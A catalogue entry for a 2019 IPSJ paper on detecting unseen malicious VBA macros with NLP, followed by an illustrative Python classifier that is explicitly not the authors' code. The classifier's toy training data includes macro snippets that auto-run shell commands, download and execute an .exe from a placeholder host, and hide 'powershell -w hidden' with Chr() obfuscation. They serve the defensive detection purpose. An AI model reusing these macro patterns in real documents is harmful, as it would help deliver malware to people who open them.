Detecting Unseen Malicious VBA Macros with NLP Techniques
Description
In recent years, the number of targeted email attacks that use Microsoft (MS) document files has been increasing. In particular, such MS document files often contain malicious VBA (Visual Basic for Applications) macros. Several methods have been proposed to detect malicious MS document files; however, few methods analyze the malicious macros themselves. This paper proposes a method to detect unseen malicious macros using words extracted from their source code. Malicious macros tend to contain typical functions to download or execute the main body of the malware, as well as obfuscated strings such as encoded or divided characters. Our method builds feature vectors from the corpus using several NLP (Natural Language Processing) techniques, trains basic classifiers on the extracted feature vectors and labels, and uses the trained classifiers to predict the labels of unseen macros. Experimental results show that our method can detect 89% of new malware families, and the best F-measure is 0.93. ------------------------------ This is a preprint of an article intended for publication in the Journal of Information Processing (JIP). This preprint should not be cited. This article should be cited as: Journal of Information Processing Vol.27 (2019) (online) DOI http://dx.doi.org/10.2197/ipsjjip.27.555 ------------------------------
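The pipeline summarized above (words extracted from macro source, NLP feature vectors, a basic classifier, prediction on unseen macros) can be sketched in a few dozen lines. This is a minimal illustration under stated assumptions, not the authors' implementation: the abstract does not name the tokenizer, NLP models, or classifiers, so the regex tokenizer, TF-IDF weighting, and nearest-centroid classifier below are stand-ins chosen for brevity, and every macro in it is a hypothetical toy example rather than data from the paper. The `f_measure` helper shows how an F-measure like the reported 0.93 is computed: the harmonic mean of precision and recall for the malicious class.

```python
import math
import re
from collections import Counter

# Assumption: a "word" is any identifier-like run of characters. This covers VBA
# keywords, function names (CreateObject, Shell, Chr) and words inside string literals.
WORD_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def tokenize(source: str) -> list[str]:
    """Extract lowercase word tokens from VBA macro source code."""
    return [w.lower() for w in WORD_RE.findall(source)]


def normalize(vec: dict[str, float]) -> dict[str, float]:
    """Scale a sparse vector to unit L2 length (empty vectors stay empty)."""
    norm = math.sqrt(sum(v * v for v in vec.values()))
    return {w: v / norm for w, v in vec.items()} if norm else {}


def fit_idf(docs: list[list[str]]) -> dict[str, float]:
    """Smoothed inverse document frequency of every word in the training corpus."""
    n = len(docs)
    df = Counter(w for doc in docs for w in set(doc))
    return {w: math.log((1 + n) / (1 + c)) + 1.0 for w, c in df.items()}


def tfidf(doc: list[str], idf: dict[str, float]) -> dict[str, float]:
    """Unit-length TF-IDF vector; words never seen in training are ignored."""
    tf = Counter(w for w in doc if w in idf)
    return normalize({w: c * idf[w] for w, c in tf.items()})


def dot(a: dict[str, float], b: dict[str, float]) -> float:
    return sum(v * b.get(w, 0.0) for w, v in a.items())


class NearestCentroid:
    """Hypothetical basic classifier: predict the label whose normalized mean
    training vector has the highest cosine similarity with the input vector."""

    def fit(self, vectors, labels):
        sums: dict[str, dict[str, float]] = {}
        for vec, label in zip(vectors, labels):
            acc = sums.setdefault(label, {})
            for w, v in vec.items():
                acc[w] = acc.get(w, 0.0) + v
        self.centroids = {lab: normalize(acc) for lab, acc in sums.items()}
        return self

    def predict(self, vec):
        return max(self.centroids, key=lambda lab: dot(vec, self.centroids[lab]))


def f_measure(y_true, y_pred, positive="malicious") -> float:
    """Harmonic mean of precision and recall for the positive class."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(t == positive and p == positive for t, p in pairs)
    fp = sum(t != positive and p == positive for t, p in pairs)
    fn = sum(t == positive and p != positive for t, p in pairs)
    if tp == 0:
        return 0.0
    precision, recall = tp / (tp + fp), tp / (tp + fn)
    return 2 * precision * recall / (precision + recall)


# Toy, hand-written macros for illustration only (not data from the paper).
train = [
    ('Sub AutoOpen()\n  Set sh = CreateObject("WScript.Shell")\n'
     '  sh.Run Chr(99) & Chr(109) & "d /c start payload.exe"\nEnd Sub', "malicious"),
    ('Sub Document_Open()\n  Set http = CreateObject("MSXML2.XMLHTTP")\n'
     '  http.Open "GET", "http://example.com/a.exe", False\n'
     '  Shell Environ("TEMP") & "\\a.exe"\nEnd Sub', "malicious"),
    ('Sub FormatReport()\n  Range("A1:D1").Font.Bold = True\n'
     '  Columns("A:D").AutoFit\nEnd Sub', "benign"),
    ('Sub SumColumn()\n  Dim total As Double\n'
     '  total = Application.WorksheetFunction.Sum(Range("B2:B100"))\n'
     '  MsgBox "Total: " & total\nEnd Sub', "benign"),
]
train_docs = [tokenize(src) for src, _ in train]
idf = fit_idf(train_docs)
clf = NearestCentroid().fit([tfidf(d, idf) for d in train_docs], [lab for _, lab in train])

# "Unseen" macros; the first splits "powershell" into Chr(112) & "owershell".
unseen = [
    ('Sub AutoOpen()\n  Set obj = CreateObject("WScript.Shell")\n'
     '  obj.Run Chr(112) & "owershell -w hidden"\nEnd Sub', "malicious"),
    ('Sub HighlightTotals()\n  Range("E2:E50").Font.Bold = True\n'
     '  Columns("E").AutoFit\nEnd Sub', "benign"),
]
predictions = [clf.predict(tfidf(tokenize(src), idf)) for src, _ in unseen]
print(predictions, f_measure([lab for _, lab in unseen], predictions))
```

Even this crude bag-of-words model picks up the signals the abstract points to: download and execute functions such as `CreateObject`, `Shell`, and `Run`, and obfuscation helpers such as `Chr`. Swapping in richer NLP representations or other classifiers would only change `tfidf` and `NearestCentroid`.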
Journal
- 情報処理学会論文誌 (IPSJ Journal) 60 (9), 2019-09-15
Details
- CRID: 1050564288434035072
- NII Article ID: 170000180441
- NII Book ID: AN00116647
- ISSN: 1882-7764
- Text Lang: en
- Article Type: journal article
- Data Source: IRDB, CiNii Articles